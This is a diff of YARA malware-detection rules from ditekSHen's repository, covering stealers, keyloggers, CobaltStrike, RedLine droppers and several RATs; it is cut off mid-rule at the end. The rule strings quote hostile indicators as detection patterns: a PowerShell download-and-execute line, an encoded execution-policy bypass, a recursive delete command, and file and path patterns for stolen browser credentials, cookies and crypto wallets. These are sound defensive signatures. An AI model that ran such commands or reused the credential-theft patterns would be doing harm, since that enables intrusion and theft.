-		id = "15385e0b-ead4-5614-a04e-55878eb70b34"
+		id = "15f80970-6bc7-5e29-86d6-f7529a10d227"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L589-L602"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1715-L1730"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8b601d68eff65bc6cc2fb46630a7021e229764f9a80f6d3278ba3b9f55e5b114"
+		logic_hash = "b8474c74cd9f21fcb3a8ae1c7a7a0a801f0f117782e9803cdae39daf7f0f8b2f"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.TRAT"
 
 	strings:
-		$pdb1 = "\\Network Administrator" ascii
-		$pdb2 = "\\Binaries\\Plugins\\Tools\\RPCService.pdb" ascii
-		$s1 = "CIntelliAdminRPC" fullword wide
-		$s2 = "IntelliAdmin RPC Service" fullword wide
-		$s3 = "IntelliAdmin Remote Execute v" ascii
-		$s4 = "IntelliAdminRPC" fullword ascii
+		$s1 = "^STEAM_0:[0-1]:([0-9]{1,10})$" fullword wide
+		$s2 = "^7656119([0-9]{10})$" fullword wide
+		$s3 = "Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)" ascii
+		$s4 = "\"schtasks\", \"/delete /tn UpdateWindows /f\");" ascii
+		$s5 = "ProcessWindowStyle.Hidden" ascii
+		$s6 = "+<>c+<<ListCommands>" ascii
+		$s7 = "//B //Nologo *Y" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $pdb* ) or 2 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_PET_Sharpwmi : FILE
+rule DITEKSHEN_MALWARE_Win_Cryptbot : FILE
 {
 	meta:
-		description = "Detects SharpWMI"
+		description = "CryptBot/Fugrafa stealer payload"
 		author = "ditekSHen"
-		id = "9c58d9fa-04b8-5a9c-8ae9-ff2e7530772f"
+		id = "248961dd-b98d-509b-92a0-1670b7687e25"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L604-L619"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1732-L1766"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e6c5764d0883e2882e06f07e4729362011a4d65614259b85978e1c6ef5cfadb7"
+		logic_hash = "6322b8b1ad210fac4475c194e060046538d4174f69a7c0e3618646d262cd33bd"
 		score = 75
-		quality = 73
+		quality = 69
 		tags = "FILE"
+		snort2_sid = "920110"
+		snort3_sid = "920108"
+		clamav_sig = "MALWARE.Win.Trojan.CryptBot"
 
 	strings:
-		$s1 = "scriptKillTimeout" fullword ascii
-		$s2 = "RemoteWMIExecuteWithOutput" fullword ascii
-		$s3 = "RemoteWMIFirewall" fullword ascii
-		$s4 = "iex([char[]](@({0})|%{{$_-bxor{1}}}) -join '')" fullword wide
-		$s5 = "\\\\{0}\\root\\subscription" fullword wide
-		$s6 = "_Context##RANDOM##" fullword wide
-		$s7 = "executevbs" fullword wide
-		$s8 = "scriptb64" fullword wide
+		$s1 = "Username: %wS" fullword wide
+		$s2 = "Computername: %wS" fullword wide
+		$s3 = "/c rd /s /q %" wide
+		$s4 = "IP: N0t_IP" fullword wide
+		$s5 = "Country: N0t_Country" fullword wide
+		$s6 = "password-check" fullword ascii
+		$s7 = "Content-Disposition: form-data; name=\"file\"; filename=\"" ascii wide
+		$s8 = "[ %wS ]" wide
+		$s9 = "EXE_PATH:" wide
+		$s10 = "Username (Computername):" wide
+		$s11 = "Operating system language:" wide
+		$s12 = "/index.php" wide
+		$f1 = "*ledger*.txt" fullword wide
+		$f2 = "*crypto*.xlsx" fullword wide
+		$f3 = "*private*.txt" fullword wide
+		$f4 = "*wallet*.dat" fullword wide
+		$f5 = "*pass*.txt" fullword wide
+		$f6 = "*bitcoin*.txt" fullword wide
+		$p1 = "%USERPROFILE%\\Desktop\\*.txt" fullword wide
+		$p2 = "%USERPROFILE%\\Desktop\\secret.txt" fullword wide
+		$p3 = "%USERPROFILE%\\Desktop\\report.doc" fullword wide
+		$pattern1 = /(files_|_Files)\\(_?)(cookies|cryptocurrency|forms|passwords|system_info|screenshot|screen_desktop|information|files|wallet|cc|Coinomi)\\?(\.txt|\.jpg|\.jpeg)?/ ascii wide nocase
+		$pattern2 = /%(s|ws)\\%(s|ws)\\(Login Data|Cookies|Web Data)/ fullword wide
+		$pattern3 = /(_AllPasswords_list.txt|_AllForms_list.txt|_AllCookies_list.txt|_All_CC_list.txt|_Information.txt|_Info.txt|_Screen_Desktop.jpeg)/ fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and ( ( 5 of ( $s* ) and 1 of ( $p* ) ) or ( 4 of ( $s* ) and 1 of ( $f* ) and 1 of ( $p* ) ) or ( 2 of ( $pattern* ) and 3 of ( $s* ) ) or ( #pattern1 > 6 and ( 2 of ( $s* ) or 1 of ( $p* ) ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PET_Defendercontrol : FILE
+rule DITEKSHEN_MALWARE_Win_Matiex : FILE
 {
 	meta:
-		description = "Detects Defender Control"
+		description = "Matiex/XetimaLogger keylogger payload"
 		author = "ditekSHen"
-		id = "7bc1f26e-2432-5642-b1e7-c87683f7d932"
+		id = "61803e0c-8f6a-5ded-855a-ff26eed1384f"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L621-L631"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1768-L1788"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "826ed0643a07580750eb11c4cf2c2759f53b6c2bda51705476edc4808abccbf8"
+		logic_hash = "62b45c43d99bef93a6c0e72200b869fdce331f8fa325640df7d8b72af56a3ef2"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.MatiexKeylogger"
 
 	strings:
-		$s1 = "Windows Defender Control" wide
-		$s2 = "www.sordum.org" wide ascii
-		$s3 = "dControl" wide
+		$id = "--M-A-T-I-E-X--K-E-Y-L-O-G-E-R--" ascii wide
+		$s1 = "StartKeylogger" fullword ascii
+		$s2 = "_KeyboardLoggerTimer" ascii
+		$s3 = "_ScreenshotLoggerTimer" ascii
+		$s4 = "_VoiceRecordLogger" ascii
+		$s5 = "_ClipboardLoggerTimer" ascii
+		$s6 = "get_logins" fullword ascii
+		$s7 = "get_processhackerFucked" fullword ascii
+		$s8 = "_ThePSWDSenders" fullword ascii
+		$pdb = "\\Before FprmT\\Document VB project\\FireFox Stub\\FireFox Stub\\obj\\Debug\\VNXT.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of them
+		uint16( 0 ) == 0x5a4d and ( $id or 4 of ( $s* ) or ( $pdb and 2 of them ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PET_Mulit_Venomagent : FILE
+rule DITEKSHEN_MALWARE_Win_Iamthekingkeylogger : FILE
 {
 	meta:
-		description = "Detects Venom Proxy Agent"
+		description = "IAmTheKing Keylogger payload"
 		author = "ditekSHen"
-		id = "598bc773-cbe9-503b-ba3e-27c2cde8910d"
+		id = "f9c84241-6db2-5243-9bea-2165104cb0c3"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L633-L645"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1790-L1805"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5eda23a237404a44dc9eb057adbf6106166374168eb08e55c182da5c05ecb4f1"
+		logic_hash = "80d8cabfd02cd73e19e6cf1c2a8a5f06c5b3b502fe4f07289e92b448425aaa6d"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.IAmTheKingKeylogger"
 
 	strings:
-		$s1 = "github.com/Dliv3/Venom/" ascii
-		$s2 = "3HpKQVB3nT3qaNQPT-ZU/SKJ55ofz5TEmg5O3ROWA/CUs_-gfa04tGVO633Z4G/OSeEpRRb0Sq_5R6ArIi-" ascii
-		$s3 = "venom_agent -" ascii
-		$s4 = "bufferssh-userauthtransmitfileunknown portwirep: p->m= != sweepgen" ascii
-		$s5 = "golang.org/x/crypto/ssh.(*handshakeTransport).readPacket"
+		$s1 = "[TIME:]%d/%d/%d %02d:%02d:%02d" fullword ascii
+		$s2 = "[TITLE:]" fullword ascii
+		$s3 = "%s-%02d-%02d-%02d-%02d" fullword ascii
+		$s4 = "[DATA]:" fullword ascii
+		$s5 = "[BK]" fullword ascii
+		$s6 = "Log.txt" fullword ascii
+		$s7 = "sonme hting is wrong x" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf ) and 3 of them
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_HFS_Webserver : FILE
+rule DITEKSHEN_MALWARE_Win_Iamthekingscrcap : FILE
 {
 	meta:
-		description = "Detects HFS Web Server"
+		description = "IAmTheKing screen capture payload"
 		author = "ditekSHen"
-		id = "2c9d9a38-8a6c-5c53-84bc-4eef77933172"
+		id = "ba385194-9578-568c-b908-bc4fc742e52e"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L647-L658"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1807-L1821"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f5b8947e3858466dae5f476790842500f8184c4676d8c0c4870adb7fd3206652"
+		logic_hash = "594ddad4e08bad51f90de1c4299e28b4800b4fa686bd4176e406ba401a1242ba"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "SOFTWARE\\Borland\\Delphi\\" ascii
-		$s2 = "C:\\code\\mine\\hfs\\scriptLib.pas" fullword ascii
-		$s3 = "hfs.*;*.htm*;descript.ion;*.comment;*.md5;*.corrupted;*.lnk" ascii
-		$s4 = "Server: HFS" ascii
+		$s1 = "@MyScreen.jpg" fullword wide
+		$s2 = "DISPLAY" fullword wide
+		$s3 = ".?AVCImage@ATL@@" fullword ascii
+		$s4 = ".?AVGdiplusBase@Gdiplus@@" fullword ascii
+		$s5 = ".?AVImage@Gdiplus@@" fullword ascii
+		$s6 = ".?AVBitmap@Gdiplus@@" fullword ascii
+		$s7 = ".?AVCAtlException@ATL@@" fullword ascii
 
 	condition:
 		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_PROX_Lanproxy : FILE
+rule DITEKSHEN_MALWARE_Win_Iamthekingkingofhearts : FILE
 {
 	meta:
-		description = "Detects lanproxy-go-client"
+		description = "IAmTheKing King Of Hearts payload"
 		author = "ditekSHen"
-		id = "71fc23d9-9aae-5666-832b-90cf5a86c474"
+		id = "95c73ec0-75b0-5d46-87da-b30feb170716"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L660-L675"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1823-L1843"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "13a5aaea0fb522e3badb4a60d2db8d7dd46e5721bd6dc2e2b2e29d49e197c375"
+		logic_hash = "75b6dd0ebb90fd04f9e4a0b1fc6a1bbf417fc66daad24c8b01f0390f6155ec55"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "serverShare" fullword ascii
-		$s2 = "parkingOnChan" fullword ascii
-		$s3 = "{{join .Names \", \"}}{{\"\\t\"}}{{.Usage}}{{end}}{{end}}{{end}}{{end}}{{" ascii
-		$s4 = "</table></thead></tbody>" fullword ascii
-		$s5 = "value=aacute;abreve;addressagrave;alt -> andand;angmsd;angsph;any -> apacir;approx;articleatilde;barvee;barwed;bdoUxXvbecaus;ber" ascii
-		$s6 = "/dev/urandom127.0.0.1:" ascii
-		$s7 = "non-IPv4 addressnon-IPv6 addressntrianglelefteq;object is remotepacer: H_m_prev=reflect mismatchregexp: Compile(remote I/O error" ascii
-		$s8 = ".WithDeadline(.in-addr.arpa." ascii
+		$s1 = "write info fail!!! GetLastError-->%u" fullword ascii
+		$s2 = "LookupAccountSid Error %u" fullword ascii
+		$s3 = "CreateServiceErrorID:%d" fullword ascii
+		$s4 = "In ControlServiceErrorID:%d" fullword ascii
+		$s5 = "In QueryServiceStatus ErrorID:%d" fullword ascii
+		$s6 = "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"" fullword ascii
+		$s7 = "hello%s" fullword ascii
+		$s8 = "additional header failed..." fullword ascii
+		$s9 = "Set Option failed errcode: %ld" fullword ascii
+		$s10 = "add cookie failed..." fullword ascii
+		$u1 = "Mozilla/4.0 (compatible; )" fullword ascii
+		$u2 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and 6 of them
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $u* ) and 4 of ( $s* ) ) or ( all of ( $u* ) and 3 of ( $s* ) ) or ( 5 of them ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PET_Peirates : FILE
+rule DITEKSHEN_MALWARE_Win_Cobaltstrike : FILE
 {
 	meta:
-		description = "Detects Kubernetes penetration tool Peirates"
+		description = "CobaltStrike payload"
 		author = "ditekSHen"
-		id = "74ce83ed-0d93-5cb0-97e8-6885ae83b336"
+		id = "140e16d0-0102-5650-a371-c95013d7f021"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L677-L694"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1845-L1864"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "321f06af098283638f99d027dc3c95a25a72192a25c7afa5081a7dbff8c3acb7"
+		logic_hash = "43513aef0ed715f0c214d7a14e465350f9c1bcadf87535e1c12561e976398bb3"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 
 	strings:
-		$s1 = "DeprecatedServiceAccount" fullword ascii
-		$s2 = "LivenessProbe" fullword ascii
-		$s3 = "\\t\\tkubectl expose rs nginx --port=80 --target-port=8000" ascii
-		$s4 = "\\t\\tkubectl run hazelcast --image=hazelcast --port=5701" ascii
-		$s5 = "COMPREPLY[$i]=${COMPREPLY[$i]#\"$colon_word\"}" ascii
-		$s6 = "%*polymorphichelpers.HistoryViewerFunc" ascii
-		$s7 = "ListenAndServeTLS" ascii
-		$s8 = "DownwardAPI" ascii
-		$s9 = "; plural=(n%10==1 && n%100!=11 ? 0 : n != 0 ? 1 : 2);proto:" ascii
-		$s10 = "name: attack-" ascii
+		$s1 = "%%IMPORT%%" fullword ascii
+		$s2 = "www6.%x%x.%s" fullword ascii
+		$s3 = "cdn.%x%x.%s" fullword ascii
+		$s4 = "api.%x%x.%s" fullword ascii
+		$s5 = "%s (admin)" fullword ascii
+		$s6 = "could not spawn %s: %d" fullword ascii
+		$s7 = "Could not kill %d: %d" fullword ascii
+		$s8 = "Could not connect to pipe (%s): %d" fullword ascii
+		$s9 = /%s\.\d[(%08x).]+\.%x%x\.%s/ ascii
+		$pwsh1 = "IEX (New-Object Net.Webclient).DownloadString('http" ascii
+		$pwsh2 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and 9 of them
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or ( all of ( $pwsh* ) and 2 of ( $s* ) ) or ( #s9 > 6 and 4 of them ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PET_Botb : FILE
+rule DITEKSHEN_MALWARE_Win_Redlinedropperahk : FILE
 {
 	meta:
-		description = "Detects Break out the Box (BOtB)"
+		description = "Detects AutoIt/AutoHotKey executables dropping RedLine infostealer"
 		author = "ditekSHen"
-		id = "acafa6dd-51b9-5945-b1df-7763a97a424f"
+		id = "16eee826-f1fd-5a6f-b6f3-e02ccd889614"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L696-L710"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1866-L1878"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a01f796b27852f9217d9bfea32f8d9ffb3c88521d4413f6612f7a0544cf44fb3"
+		logic_hash = "0950fe9daa02f3a8fd527f75275766111be7e8774578963b0bdb455800dfc4f9"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.RedLineDropper-AHK"
 
 	strings:
-		$s1 = "to unallocated span%%!%c(*big.Float=%s), RecursionDesired: /usr/share/zoneinfo//{Bucket}/{Key+}?acl/{Bucket}?accelerate/{Bucket}?encryption/{Bucket}?" ascii
-		$s2 = "exploit CVE-2019-5736 with command: [ERROR] In Enabling CGROUP Notifications -> 'echo 1 > [INFO] CGROUP may exist, attempting exploit regardless" ascii
-		$s3 = "main.execShellCmd" ascii
-		$s4 = "[*] Data uploaded to:[+]" ascii
-		$s5 = "whitespace or line breakfailed to find credentials in the environment.failed to get %s EC2 instance role credentialsfirst" ascii
-		$s6 = "This process will exit IF an EXECVE is called in the Container or if the Container is manually stoppedPerform reverse DNS lookups" ascii
-		$s7 = "http: request too largehttp://100.100.100.200/http://169.254.169.254/index out of range" ascii
+		$s1 = ".SetRequestHeader(\"User-Agent\",\" ( \" OSName \" | \" bit \" | \" CPUNAme \"\"" ascii
+		$s2 = ":= \" | Windows Defender\"" ascii
+		$s3 = "WindowSpy.ahk" wide
+		$s4 = ">AUTOHOTKEY SCRIPT<" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x457f and 6 of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_LSASS_Createminidump : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagent01 : FILE
 {
 	meta:
-		description = "Detects CreateMiniDump tool"
+		description = "Detects known downloader agent"
 		author = "ditekSHen"
-		id = "0d8642d1-2ed9-5270-a54a-6ba788026f5f"
+		id = "85ead6fd-b56e-5e78-8fb4-7c9ecb4c0b58"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L712-L724"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1880-L1894"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "577ccc783554363c0bed80d9642e8a0f107fc2ec66d84f76b9556aa3506c86c0"
+		logic_hash = "7aec81655af9b779a314c3e2cff933aa6426fcfe21b5a87e60e159c7e7f5238a"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		snort_sid = "920007"
+		clamav_sig = "MALWARE.Win.Trojan.DLAgent01"
 
 	strings:
-		$s1 = "lsass.dmp" fullword wide
-		$s2 = "lsass dumped successfully!" ascii
-		$s3 = "Got lsass.exe PID:" ascii
-		$s4 = "\\experiments\\CreateMiniDump\\CreateMiniDump\\" ascii
-		$s5 = "MiniDumpWriteDump" fullword ascii
+		$s1 = "Mozilla/5.0 Gecko/41.0 Firefox/41.0" fullword wide
+		$s2 = "/Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List" fullword wide
+		$s3 = "GUID.log" fullword wide
+		$s4 = "NO AV" fullword wide
+		$s5 = "%d:%I64d:%I64d:%I64d" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of them
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Securityxploded_Browserpassworddumper : FILE
+rule DITEKSHEN_MALWARE_Linux_PLEAD : FILE
 {
 	meta:
-		description = "Detects SecurityXploded Browser Password Dumper tool"
+		description = "PLEAD Linux payload"
 		author = "ditekSHen"
-		id = "ce90ef96-43c0-5d68-ba7d-21aafb3f754b"
+		id = "07aa0561-d6d9-53b6-97ac-670cdf04335d"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L726-L737"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1896-L1920"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b3c6e9b393c244c7bf6489f54ebd622a09da050a65d6dbde325d5bcd7d85f39a"
+		logic_hash = "539998248ded0eb8ea1702c527804f89cfd55412f17ec699bd0af801f4fba673"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Linux.Trojan.PLEAD"
 
 	strings:
-		$s1 = "\\projects\\windows\\BrowserPasswordDump\\Release\\FireMaster.pdb" ascii
-		$s2 = "%s: Dumping passwords" fullword ascii
-		$s3 = "%s - Found login data file...dumping the passwords from file %s" fullword ascii
-		$s4 = "%s Dumping secrets from login json file %s" fullword ascii
+		$x1 = "CFileTransfer" ascii
+		$x2 = "CFileManager" ascii
+		$x3 = "CPortForward" ascii
+		$x4 = "CPortForwardManager" ascii
+		$x5 = "CRemoteShell" ascii
+		$x6 = "CSockClient" ascii
+		$s1 = "/proc/self/exe" fullword ascii
+		$s2 = "/bin/sh" fullword ascii
+		$s3 = "echo -e '" ascii
+		$s4 = "%s    <DIR>    %s" ascii
+		$s5 = "%s    %lld    %s" ascii
+		$s6 = "Files: %d        Size: %lld" ascii
+		$s7 = "Dirs: %d" ascii
+		$s8 = "%s(%s)/" ascii
+		$s9 = "%s %s %s %s" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x457f and ( all of ( $x* ) or all of ( $s* ) or 12 of them )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Securityxploded_Ftppassworddumper : FILE
+rule DITEKSHEN_MALWARE_Win_CRAT : FILE
 {
 	meta:
-		description = "Detects SecurityXploded FTP Password Dumper tool"
+		description = "Detects CRAT main DLL"
 		author = "ditekSHen"
-		id = "d876c201-b527-531c-9563-0b1a1c6334cb"
+		id = "9757a8de-61ea-55c0-b64c-055798450985"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L739-L750"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1922-L1944"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "941bfb9b1ce71252c5aa05bd654bdcf1af6cc1d5f720bc2c239e17454f15beda"
+		logic_hash = "5a9fef68e110a1564dd5956408abcc3736cfa6853e1ac5510a089cc68f6bdc35"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "\\projects\\windows\\FTPPasswordDump\\Release\\FireMaster.pdb" ascii
-		$s2 = "//Dump all the FTP passwords to a file \"c:\\passlist.txt\"" ascii
-		$s3 = "//Dump all the FTP passwords to console" ascii
-		$s4 = "FTP Password Dump" fullword wide
+		$s1 = "cmd /c \"dir %s /s >> %s\"" wide
+		$s2 = "Set-Cookie:\\b*{.+?}\\n" wide
+		$s3 = "Location: {[0-9]+}" wide
+		$s4 = "Content-Disposition: form-data; name=\"%s\"; filename=\"" ascii
+		$s6 = "%serror.log" wide
+		$v2x_1 = "?timestamp=%u" wide
+		$v2x_2 = "config.txt" wide
+		$v2x_3 = "entdll.dll" wide
+		$v2x_4 = "\\cmd.exe" wide
+		$v2x_5 = "[MyDocuments]" wide
+		$v2x_6 = "@SetWindowTextW FindFileExA" wide
+		$v2x_7 = "Microsoft\\Windows\\WinX\\Group1\\*.exe" wide
+		$v2s_1 = "Installed Anti Virus Programs" ascii
+		$v2s_2 = "Running Processes" ascii
+		$v2s_3 = "id=%u&content=" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 6 of ( $v2x* ) or all of ( $v2s* ) or ( 2 of ( $v2s* ) and 4 of ( $v2x* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Securityxploded_Emailpassworddumper : FILE
+rule DITEKSHEN_MALWARE_Win_Cratpluginkeylogger : FILE
 {
 	meta:
-		description = "Detects SecurityXploded Email Password Dumper tool"
+		description = "Detects CRAT keylogger plugin DLL"
 		author = "ditekSHen"
-		id = "25e140de-4a0a-5d4f-a93f-a414b9879f2b"
+		id = "a8682786-7704-56f0-a6df-b4e2ab4d7536"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L752-L764"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1946-L1962"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7f07611385d45bf45bfb8ee95e56febfb992fb7b416321c5b590878636a5c1b7"
+		logic_hash = "58ef1f7466fcc871be2e74aa447c76970fd90c9d9d345a896fb8e6335114d189"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.CRAT"
 
 	strings:
-		$s1 = "\\projects\\windows\\EmailPasswordDump\\Release\\FireMaster.pdb" ascii
-		$s2 = "//Dump all the Email passwords to a file \"c:\\passlist.txt\"" ascii
-		$s3 = "EmailPasswordDump" fullword wide
-		$s4 = "//Dump all the Email passwords to console" ascii
-		$s5 = "Email Password Dump" fullword wide
+		$ai1 = "VM detected!" fullword wide
+		$ai2 = "Sandbox detected!" fullword wide
+		$ai3 = "Debug detected!" fullword wide
+		$ai4 = "Analysis process detected!" fullword wide
+		$s1 = "Create KeyLogMutex %s failure %d" wide
+		$s2 = "Key Log Mutex already created! %s" wide
+		$s3 = /KeyLogThread\s(started|finished|terminated)!/ wide
+		$s4 = /KeyLog_(x64|x32|Win64|Win32)_DllRelease\.dll/ fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $ai* ) and 1 of ( $s* ) ) or ( 3 of ( $s* ) and 1 of ( $ai* ) ) or 5 of them )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PET_Sharpsphere : FILE
+rule DITEKSHEN_MALWARE_Win_Cratpluginclipboardmonitor : FILE
 {
 	meta:
-		description = "Detects SharpSphere red teamers tool to interact with the guest operating systems of virtual machines managed by vCenter"
